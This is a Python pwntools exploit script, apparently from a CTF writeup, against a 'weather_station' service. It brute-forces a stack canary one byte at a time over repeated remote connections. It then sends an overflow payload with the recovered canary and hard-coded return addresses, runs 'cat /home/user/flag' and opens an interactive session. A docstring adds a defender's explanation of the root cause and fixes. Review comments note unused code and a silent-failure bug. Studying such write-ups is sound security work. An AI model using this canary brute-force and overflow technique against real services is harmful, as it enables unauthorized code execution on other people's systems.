#!/usr/bin/env python3
"""Stack-canary recovery script from a CTF writeup (``weather_station``).

What the code below demonstrates, read from the script itself:

* it reconnects to the service once per guess and keeps any byte after which
  the reply contains ``Forecast sent!``; for that to accumulate across
  connections the canary must be the same in every connection (typical of a
  server that forks, rather than re-executes, per client) -- inferred, not
  visible here;
* the stack protector therefore does not stop the overflow, it only turns a
  wrong guess into a closed connection, which is the one-bit oracle the
  outer loop relies on;
* once eight bytes are known, the second stage repeats the same overflow
  with the correct canary so the check passes.

Defender's reading: the root cause is the unbounded write into the ``query``
buffer; the canary is a detection mechanism and is defeated here only
because (a) it never changes between connections and (b) success and
failure are distinguishable to the client.  Fixing the write removes the
issue; re-executing or otherwise re-randomising per connection removes the
ability to accumulate bytes.  On the server side this shows up as a burst
of short-lived connections, most of which end in a stack-smashing abort.
"""

from pwn import *

import time  # NOTE(review): not used anywhere below.

context.binary = elf = ELF('./weather_station', checksec=False)

# NOTE(review): this local process is started but never read, written or
# closed; it is unused by the rest of the script.
p = process(elf.path)

HOST, PORT = 'offsec.m0lecon.it', 13559
#HOST, PORT = '127.0.0.1', 5555

# Filler bytes between the start of the overflowed buffer and the canary;
# specific to this build of the binary.
OFFSET_TO_CANARY = 56
#
#OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8

# The script takes the lowest canary byte as 0x00 and recovers the other
# seven, one byte per outer iteration.
known = b"\x00"

for i in range(7):
    for bval in range(256):
        guess = known + bytes([bval])
        payload = b"A" * OFFSET_TO_CANARY + guess

        # One fresh connection per guess: the script relies on the canary
        # being identical across connections (see module docstring).
        io = remote(HOST, PORT, level='error')
        io.recvuntil(b'location: ')
        io.sendline(b"Safe")
        io.recvuntil(b'query: ')
        io.send(payload)

        # A wrong byte presumably makes the service abort on its canary
        # check, so the connection closes (EOF) or simply stays silent for
        # the 0.2 s timeout; either way no success banner is seen.
        try:
            data = io.recv(timeout=0.2)
        except EOFError:
            data = b""
        io.close()
        if b"Forecast sent!" in data:
            known = guess
            log.success(f"byte {i+1}: {bval:02x}")
            break
    # NOTE(review): if no value matched in this round (for example because
    # the 0.2 s timeout cut off a slow reply), the loop silently moves on
    # with `known` one byte short, and u64() below would then receive fewer
    # than 8 bytes.

canary = u64(known)

log.info(f"Canary: {canary:#x}")

# Second stage: the same overflow, now with the recovered canary in place.
io = remote(HOST, PORT, level='error')
io.recvuntil(b'location: ')
io.sendline(b"Safe")
io.recvuntil(b'query: ')

# Layout matches the commented OFFSET_TO_RIP above: filler, canary, 8 bytes
# (presumably the saved frame pointer), then two hard-coded addresses.  The
# addresses are specific to this binary; what they point at is not visible
# in this script.
payload = flat(
    b'A' * OFFSET_TO_CANARY,
    p64(canary),
    b'B' * 8,
    p64(0x000000000040101a),
    p64(0x0000000000401530),
)
io.send(payload)
print(io.recvline())
# NOTE(review): sendline() returns None, so this print only shows "None".
print(io.sendline(b'cat /home/user/flag'))
io.interactive()